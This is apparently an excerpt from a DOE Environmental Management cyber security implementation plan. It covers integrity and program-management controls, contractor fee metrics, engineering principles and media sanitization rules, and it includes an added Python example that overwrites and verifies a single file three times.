Responsibilities: The ISSO and SAs must implement, monitor, and periodically test the controls for system protection (application partitioning, security function isolation, DOS, mobile code, public access protection, DNS protection, data at rest protection) and network security protection (boundary protection, transmission confidentiality, cryptographic functions, collaborative computing devices and VoIP).
Management Commitment: The organizations’ management must ensure that procedures, resources, and personnel are available to implement both system and network security protection mechanisms.
Coordination: The ISSO must coordinate with all accreditation boundaries to ensure the system and network controls are in place, functioning and meeting the requirements.
Compliance: The sites must comply with appropriate DOE policy, RMAIP, and NIST FIPS 199 and 200 and guidance in NIST SP 800-52, 800-58, 800-77, and 800-81 (as modified).
SI-1 System and Information Integrity
Purpose: This family of controls is about discovering, preventing, repairing, monitoring, and correcting vulnerabilities and threats within the sites’ systems and networks.
Scope: The SI family of controls applies to all DOE EM and contractor systems and their associated accreditation boundaries.
Roles: The ISSO and SAs share responsibility for this control.
Responsibilities: The ISSO and SAs must design, implement, and monitor procedures for malicious code protection and monitoring, flaw remediation, security alerting, SPAM protection, error handling, and input verification and validation.
Management Commitment: The site management must implement the system and information integrity protections stated in the SSP.
Coordination: The ISSO must coordinate with all SAs to ensure that all accreditation boundaries follow the necessary procedures for system and information integrity.
Compliance: All DOE EM and contractor systems must comply with appropriate DOE policy, RMAIP, and NIST SP 800-40 (as modified).
PM-1 Program Management
FISMA requires organizations to develop and implement an organization-wide information security program to address information security for the systems and information that support the operations and assets of the organization, including those provided or managed by another organization, contractor, or other source.
Purpose: The PM family of controls focuses on the organization-wide information security requirements that are independent of any particular information system and yet are essential for managing information security programs. These security controls are implemented, monitored, and tested at the division or agency level. Some portion of these controls will require the subordinate groups to provide “roll up” information. The subordinate groups must be responsible for providing the requisite information.
Scope: The organization must document program management controls in the information security program plan (or similar document). The organization-wide information security program plan supplements the individual security plans developed for each organizational information system. Together, the security plans for the individual information systems and the information security program cover the totality of security controls employed by the organization.
In addition to documenting the information security program management controls, the security program plan provides a vehicle for the organization, in a central repository (eGov RPM), to document all security controls implementation, testing, authorization, and compliance. The reporting organization must be responsible for supplying and updating information in the eGov RPM system.
Roles: Organizations specify the individuals within the organization responsible for the development, implementation, assessment, authorization, and monitoring of the information security program management controls. At a minimum, these must be the senior agency information security officer, risk executive, AO (may be designated), and each divisional level CSPM.
Responsibilities: The information security program management controls and program management common controls contained in the information security program plan are implemented, assessed for effectiveness, and authorized by a senior agency or organizational official with the same or similar authority and responsibility for managing risk as the authorization officials for information systems. This individual will have mission, monetary, and resource control. Further, this person will be responsible for setting acceptable levels of risk.
POA&Ms must be developed and maintained for the program management and common controls that are deemed through assessment to be less than effective. Information security program management and common controls are also subject to the same continuous monitoring requirements as security controls employed in individual organizational information systems.
Management Commitment: The organization management must appoint a senior agency information security officer, provide information resources and documentation (Exhibits 300 and 53), maintain a POA&M database, establish and maintain inventory control, develop and maintain security performance metrics, establish a mission critical infrastructure plan, and provide a risk management strategy, a defined security authorization process, and a mission/business process definition.
Coordination: The organization will be responsible for the coordination of program management by distributing the necessary program management documentation, training as appropriate and monitoring agreed upon security controls and procedures for compliance and effectiveness. The program management group must coordinate with subordinate groups to ensure they are aware of, have implemented, are compliant with, and provide the required “roll up” information to program management requirements.
Compliance: The agency and associated divisions must comply with NIST FIPS 199 and 200 as well as NIST SP 800-53 (as modified), Appendix G, Information Security Programs.
Appendix D – EM Contractor Requirements
EM contractors are required to comply with requirements set forth in DOE O 205.1B, Chg. 2, Department of Energy Cyber Security Program, Attachment 1, Contractor Requirements Document (CRD). A Contractor-developed Risk Management Approach must be consistent with the requirements of this RMAIP.
Suggested Metrics for Fee Determination
Contracting Officers should work with site IT/cyber security personnel to develop metrics for fee determination consistent with DOE’s fee policies and the terms of a subject contract. This table is not mandatory but could be used to help develop and include any additional metrics based on site specific requirements.
Requirements / Below Expectations / Meets Expectations / Exceeds Expectations

Default rates (unless otherwise noted, the following incentives or disincentives must be applied; the contracting officer has the flexibility to adjust the rates/fees on a contract by contract basis)
  Below Expectations: Reduce fee by 1-2%
  Meets Expectations: No change to fee
  Exceeds Expectations: Increase fee by 0.25%

Type I
  Below Expectations: Incidents are not reported upon occurrence. Reduce fee by 10-15%.
  Meets Expectations: Incidents are reported as required. No change to fee.
  Exceeds Expectations: A reported incident is proven to prevent a similar incident at another DOE site. Increase fee by 0.5%.

Type II
  Below Expectations: Incidents are not reported upon occurrence.
  Meets Expectations: Incidents are reported as required.
  Exceeds Expectations: A reported incident is proven to prevent a similar incident at another DOE site. Increase fee by 0.25%.

Protected PII
  Below Expectations: Incident is not reported upon occurrence as required. Reduce fee by 2-3%.
  Meets Expectations: Incidents are reported as required.
  Exceeds Expectations: Protected PII is detected and prevented from leaving the site. Increase fee by 0.5%.

Overdue POA&Ms
  Below Expectations: Reduce fee by 1-2%.
  Meets Expectations: No change to fee.
  Exceeds Expectations: N/A

User Awareness Training 1
  Below Expectations: Less than 90% of users trained annually.
  Meets Expectations: 100% of users trained annually.
  Exceeds Expectations: 100% of users trained semi-annually. Increase fee by .5% up to $50K max/year.

User Access
  Below Expectations: Users are provided access to the network before completing training.
  Meets Expectations: Users are provided access to the network after completing user training.
  Exceeds Expectations: Users are provided access to the network after completing user training. Completion of the training requires users to successfully pass a contractor-developed test. Increase fee by .5% up to $50K max/year.

Privileged Users Awareness Training
  Below Expectations: 100% of privileged users are trained annually. At least 25% hold a current industry recognized certification.
  Meets Expectations: 100% of privileged users are trained annually and 33% hold a current industry recognized certification.
  Exceeds Expectations: 100% of privileged users are trained annually and 66% hold a current industry recognized certification.

Maintaining eGov RPM
  Below Expectations: Documents not uploaded into the system or not updated at least bi-annually.
  Meets Expectations: Updates should be noted in the record of changes. Modified documents should be re-uploaded into the system. Documents are uploaded at least bi-annually into the system.
  Exceeds Expectations: No change in fee.

Patching
  Below Expectations: Patches are older than 30 days from release/notice.
  Meets Expectations: Patches are installed between 11 and 30 days from release/notice.
  Exceeds Expectations: Patches are installed less than 10 days from release/notice.

Maintaining Baseline Configurations – OS (FDCC for Windows XP/VISTA/Win7)
  Below Expectations: Less than 85% of all systems use the standard baseline configuration without deviation.
  Meets Expectations: 85% of all systems use the standard baseline configuration without deviation.
  Exceeds Expectations: 100% of applications operate without deviation to any baseline configuration settings.

Maintaining Baseline Configurations - Apps
  Below Expectations: Less than 85% of all applications use the recommended security baseline configuration settings.
  Meets Expectations: 85% of all applications use the recommended security baseline configuration settings.
  Exceeds Expectations: 100% of all applications use the recommended security baseline configuration settings.

Maintaining a System Inventory
  Below Expectations: No inventory of major IT hardware and software exists.
  Meets Expectations: An up-to-date inventory of major IT hardware and software exists.
  Exceeds Expectations: A real-time or near real-time automated inventory of major IT hardware and software exists.

Government Provided Enterprise Solutions & Site Assessments – The contractor is to cooperate in the deployment of Government provided enterprise solutions for the purposes of protecting IT resources and all Site Assessments
  Below Expectations: Contractor does not cooperate with the deployment. Reduce fee accordingly or take other appropriate actions.
  Meets Expectations: Full cooperation. No change in fee.
  Exceeds Expectations: (none stated)

Sharing of infrastructure and IT solutions – the contractor is to cooperate with other EM support contractors in the development and deployment of IT solutions in order to save energy and funding
  Below Expectations: Contractor does not cooperate. Reduce fee by 5%.
  Meets Expectations: Full cooperation.
  Exceeds Expectations: Increase fee as determined by the contracting officer.
Definitions:
Below expectations – The rating assigned to a contractor that has failed to meet any of the defined requirements as deemed by the Certification Agent, the Contracting Officer, or the Federal Task Manager.
Meets expectations – The rating assigned to a contractor that has met the defined requirements as deemed by the Certification Agent, the Contracting Officer, or the Federal Task Manager.
Exceeds expectations – The rating assigned to a contractor that has exceeded the defined requirements as deemed by the Certification Agent, the Contracting Officer, or the Federal Task Manager and has not had a below expectations rating within the last two years.
Appendix E – NIST 800-27 Rev A Engineering Principles
This appendix is guidance to enable sites to comply with NIST 800-53 Rev 4, control SA-8, Engineering Principles. One check “” signifies the principle can be used to support the life-cycle phase, and two checks “” signifies the principle is key to successful completion of the life-cycle phase.
Columns: Principle / Initiation / Devel/Acquis / Implement / Oper/Maint / Disposal
Does your organization perform any of the following principle activities during any part of the system development life cycle listed to the right? If yes, highlight the appropriate box for the corresponding phase yellow, otherwise leave blank.
1 Establish a sound security policy as the “foundation” for design
2 Treat security as an integral part of the overall system design
3 Clearly delineate the physical and logical security boundaries governed by associated security policies
4 (formerly 33) Ensure that developers are trained in how to develop secure software
5 (formerly 4) Reduce risk to an acceptable level
6 (formerly 5) Assume that external systems are insecure
7 (formerly 6) Identify potential trade-offs between reducing risk and increased costs and decrease in other aspects of operational effectiveness.
8 Implement tailored system security measures to meet organizational security goals.
9 (formerly 26) Protect information while being processed, in transit, and in storage
10 (formerly 29) Consider custom products to achieve adequate security
11 (formerly 31) Protect against all likely classes of “attacks”
12 (formerly 18) Where possible, base security on open standards for portability and interoperability
13 (formerly 19) Use common language in developing security requirements
14 (formerly 21) Design security to allow for regular adoption of new technology, including a secure and logical technology upgrade process
15 (formerly 27) Strive for operational ease of use
16 (formerly 7) Implement layered security (Ensure no single point of vulnerability)
17 (formerly 10) Design and operate an IT system to limit damage and to be resilient in response
18 (formerly 13) Provide assurance that the system is, and continues to be, resilient in the face of expected threats
19 (formerly 14) Limit or contain vulnerabilities
20 (formerly 16) Isolate public access systems from mission critical resources (e.g., data, processes, etc.)
21 (formerly 17) Use boundary mechanisms to separate computing systems and network infrastructures
22 (formerly 20) Design and implement audit mechanisms to detect unauthorized use and to support incident investigations
23 (formerly 28) Develop and exercise contingency or disaster recovery procedures to ensure appropriate availability
24 (formerly 9) Strive for simplicity
25 (formerly 11) Minimize the system elements to be trusted
26 (formerly 24) Implement least privilege.
27 (formerly 25) Do not implement unnecessary security mechanisms
28 (formerly 30) Ensure proper security in the shutdown or disposal of a system
29 (formerly 32) Identify and prevent common errors and vulnerabilities
30 (formerly 12) Implement security through a combination of measures distributed physically and logically
31 (formerly 15) Formulate security measures to address multiple overlapping information domains
32 (formerly 22) Authenticate users and processes to ensure appropriate access control decisions both within and across domains
33 (formerly 23) Use unique identities to ensure accountability
Appendix F – Sanitization and Disposal of Media and Mobile Devices
Sanitization
Unclassified Removable Media
Removable media requires sanitization prior to removal from an EM site and the government relinquishing title to the media when the media will be used again in other environments (e.g., donations to schools or other charitable organizations, returning equipment to vendors after a trial).
If the media contained classified information then the media must be destroyed in accordance with this RMAIP and applicable law and/or DOE policy, directive or guidance. The Committee on National Security Systems Policy No. 26 (CNSSP No. 26) requires that removable media be marked or labeled with the highest security classification of any system into which the media has been inserted. The threat of obfuscation on electronic media makes prohibitive the capability of transferring files from an NSS system thought to be unclassified to removable media and declassifying the media based on the viewable contents of the files transferred. All media that has been inserted in the NSS for any reason must be marked and handled at the same classification of the NSS.
Approved methods of sanitization:
- Degaussing magnetic media
- Running a wipe program such as BCWipe at least three times
Approved methods of destruction:
- Shredding
- Grinding the surface
- Degaussing magnetic media and then breaking the media into small pieces
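As an added illustration of the “wipe at least three times, then verify clean” approach the sanitization list above describes, the following is example code written for this page; it is not part of the RMAIP and is not BCWipe or any other vendor tool. It overwrites a single file in place with two fixed-pattern passes and one pseudorandom pass, reads each pass back to confirm the bytes landed, and reports whether the hash of the original content is gone. Regenerating the random pass from a retained seed so it can be verified byte for byte is an assumption of this example, not a property of any named product. The check only covers the blocks the filesystem maps to that file: journaling or copy-on-write filesystems and SSD wear levelling can keep earlier copies, which is why the RMAIP points to degaussing or physical destruction for real media.

```python
import hashlib
import os
import random
import secrets
import tempfile

# Added example for this page; not RMAIP code and not BCWipe or any vendor tool.
# Overwrites one file in place at least three times and verifies every pass.
# Assumption: a file-level overwrite only reaches the blocks the filesystem maps
# to this file. Journaling/copy-on-write filesystems and SSD wear levelling can
# retain older copies, so whole-device wiping, degaussing or destruction is what
# the RMAIP expects for real media.

CHUNK = 64 * 1024
MIN_PASSES = 3


def _stream(pass_no, seed):
    """Return a function giving the next n bytes to write for one pass."""
    if pass_no == 0:
        return lambda n: b"\x00" * n
    if pass_no == 1:
        return lambda n: b"\xff" * n
    # Pseudorandom pass seeded from a fresh secret so the same bytes can be
    # regenerated for verification (an assumption of this example).
    rng = random.Random(seed)
    return lambda n: rng.randbytes(n)


def _write_pass(path, size, stream):
    with open(path, "r+b") as fh:          # r+b keeps the file length unchanged
        left = size
        while left:
            n = min(CHUNK, left)
            fh.write(stream(n))
            left -= n
        fh.flush()
        os.fsync(fh.fileno())               # push the overwrite down to the device


def _verify_pass(path, size, stream):
    """Read the file back and confirm every byte matches what the pass wrote."""
    with open(path, "rb") as fh:
        left = size
        while left:
            n = min(CHUNK, left)
            if fh.read(n) != stream(n):
                return False
            left -= n
        return fh.read(1) == b""           # nothing beyond the overwritten span


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def sanitize_file(path, passes=MIN_PASSES):
    """Overwrite `path` `passes` times (>= 3), verifying each pass; return a report."""
    if passes < MIN_PASSES:
        raise ValueError("at least three overwrite passes are required")
    size = os.path.getsize(path)
    before = _sha256(path)
    seed = secrets.randbits(64)
    report = {"bytes": size, "passes_verified": 0, "verified": True}
    for i in range(passes):
        kind = min(i, 2)                    # fourth and later passes are random too
        _write_pass(path, size, _stream(kind, seed + i))
        if not _verify_pass(path, size, _stream(kind, seed + i)):
            report["verified"] = False      # the media did not take the write: stop
            break
        report["passes_verified"] += 1
    report["original_content_gone"] = size == 0 or _sha256(path) != before
    return report


def demo():
    """Wipe a constructed sample file and return (report, residual_found)."""
    sample = b"CONSTRUCTED SENSITIVE RECORD 0001\n" * 4000   # constructed input
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample.bin")
        with open(path, "wb") as fh:
            fh.write(sample)
        report = sanitize_file(path)
        with open(path, "rb") as fh:
            residual = b"SENSITIVE" in fh.read()
    return report, residual


if __name__ == "__main__":
    print(demo())
```

A run that returns `verified` as False is the interesting case: a read-back mismatch means the device or filesystem did not accept the overwrite, and the media should be treated as unsanitized and routed to destruction rather than excessed.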
Mobile Devices
Mobile devices that do not contain magnetic storage (e.g., BlackBerries, cell phones) may be wiped with a site-approved product designed for this purpose and then be excessed or donated by the site. Testing of electronic storage has proven that wiping is an effective means to ensure data can’t be obtained from the device once the process has been performed.
Laptops, if utilizing an approved full disk encryption solution, may also be wiped and excessed or donated by the site. If the laptop has been known to have had classified information then the disk must be destroyed prior to the laptop being excessed or donated.
Classified Media
Clear all storage media that will be reused on a different system for the same or more restrictive Information Group or a potential user that has a different Need-to-Know.
Use only overwriting software and hardware that are compatible with the media to be overwritten.
Protect cleared storage media that has been used in classified processing commensurate with the highest Information Group (i.e., classification level and category of information) it has ever contained. The media must be handled in accordance with applicable DOE Classified Matter Protection and Control processes.
Purge classified storage media that will be reused in a less restrictive Information Group.
Destroy classified storage media that cannot be purged.
Identify the reuse of classified storage media in the SSP of the system where the media is used and track/control the media until it is purged or destroyed.
Individuals performing purging of classified storage media planned for reuse must certify that the process has been successfully completed by affixing a label to the storage media. At a minimum, the label must document:
a. Storage media serial number, make and model
b. Most restrictive Information Group hosted prior to purging
c. Purpose of purging
d. A statement that the storage media contains no classified information
e. The procedure used
f. The date, printed name and signature of the certifier
Destruction
All media used in the classified program or that has been known to contain sensitive information in significant quantity must be destroyed before leaving an EM site when at its end of life. The preferred method is to wipe and destroy if possible.
Approved methods of destruction:
- Degaussing of drives
- Sanding the surfaces
- Shredding
- Grinding into fine particulate
- Burning
Acronym List
AA  Application Administrator
AO  Authorizing Official
AODR  Authorizing Official Designated Representative
ATO  Authority to Operate
BIA  Business Impact Assessment
C&A  Certification and Accreditation
CA  Certification Agent
CAO  Continuous Authorization to Operate
CCB  Change Control Board
CI  Counter-Intelligence
CIA  Confidentiality (C), Integrity (I), and Availability (A)
CIO  Chief Information Officer
CM  Continuous Monitoring
CNSS  Committee on National Security Systems
CNSSP No.26  The Committee on National Security Systems Policy No. 26
CO  Contracting Officer
CPU  Central Processing Unit
CSIRTs  Computer Security Incident Response Team(s)
CY  Calendar Year
DBA  Database Administrator
DHS  Department of Homeland Security
DNS  Domain Name System
DNSSEC  Domain Name System Security Extensions
DOE  Department of Energy
eGov RPM  eGov Risk Portfolio Manager™
EM  Office of Environmental Management
EMCSPM  EM Cyber Security Program Manager
FedRAMP  Federal Risk and Authorization Management Program
FIPS  Federal Information Processing Standards
FISMA  Federal Information Security Management Act
FRD  Formerly Restricted Data
FY  Fiscal Year
HQ  Headquarters
HQSS  Headquarters Security System
HSPD  Homeland Security Presidential Directive
ICS  Industrial Control Systems
IEEE  Institute of Electrical and Electronics Engineers
IMC  Information Management Conference
IP  Implementation Plan
IPv6  Internet Protocol Version 6
ISM  Industrial, Scientific, and Medical
ISP  Internet Service Provider
ISSM  Information System Security Manager
ISSO  Information System Security Officer
IT  Information Technology
JC3  DOE Joint Cybersecurity Center
LMH  Low (L), Moderate (M), and High (H)
MIPP  Mission Information Protection Program
MTD  Maximum Tolerable Downtime
NDA  Network Device Administrator
NIST  National Institute of Standards and Technology
NSS  National Security Systems
OMB  Office of Management and Budget
PII  Personally Identifiable Information
PIV  Personal Identity Verification
PM  Program Management
POA&M  Plan of Action and Milestones
PSO  Project Security Officer
PSP  Program Security Plan
RA  Risk Assessment
RD  Restricted Data
RE  Risk Executive
RMA  Risk Management Approach
RMAIP  Risk Management Approach Implementation Plan
RPO  Recovery Point Objective
RTO  Recovery Time Objective
SAR  Security Assessment Report
SDM  Senior DOE Management
SP  Special Publications
ST&E  Security Test and Evaluation
SSP  System Security Plan
CUI  Controlled Unclassified Information
TFNI  Transclassified Foreign Nuclear Information
UCNI  Unclassified Controlled Nuclear Information
US-CERT  US-Computer Emergency Response Team
VPN  Virtual Private Networking
WAN  Wide Area Networking
WIDS  Wireless Intrusion Detection System